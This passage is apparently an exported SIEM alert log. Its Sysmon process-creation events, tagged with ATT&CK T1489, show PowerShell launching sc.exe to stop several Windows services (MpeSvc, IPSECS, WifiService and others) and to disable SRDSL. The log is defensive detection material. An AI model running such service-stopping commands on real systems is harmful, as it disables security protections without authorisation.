Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.759",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.263 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f2801900} +ProcessId: 7064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.270314200Z"",""eventRecordID"":""2144"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.263\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f2801900}\r\nProcessId: 7064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.263"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010f2801900}"",""processId"":""7064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.700",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.215 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00105b7e1900} +ProcessId: 1052 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.220345000Z"",""eventRecordID"":""2141"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.215\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00105b7e1900}\r\nProcessId: 1052\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.215"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00105b7e1900}"",""processId"":""1052"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.651",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.176 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f27b1900} +ProcessId: 4212 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.178769800Z"",""eventRecordID"":""2138"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.176\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f27b1900}\r\nProcessId: 4212\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.176"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010f27b1900}"",""processId"":""4212"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.635",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.164 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010297b1900} +ProcessId: 5560 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SRDSL Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.166549500Z"",""eventRecordID"":""2137"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.164\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010297b1900}\r\nProcessId: 5560\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.164"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010297b1900}"",""processId"":""5560"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SRDSL Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.603",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.140 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001095791900} +ProcessId: 5044 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.142933900Z"",""eventRecordID"":""2135"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.140\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001095791900}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.140"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001095791900}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.557",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.103 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103b771900} +ProcessId: 3932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.105520700Z"",""eventRecordID"":""2132"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.103\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103b771900}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.103"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00103b771900}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.509",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.084 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ad751900} +ProcessId: 4052 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe 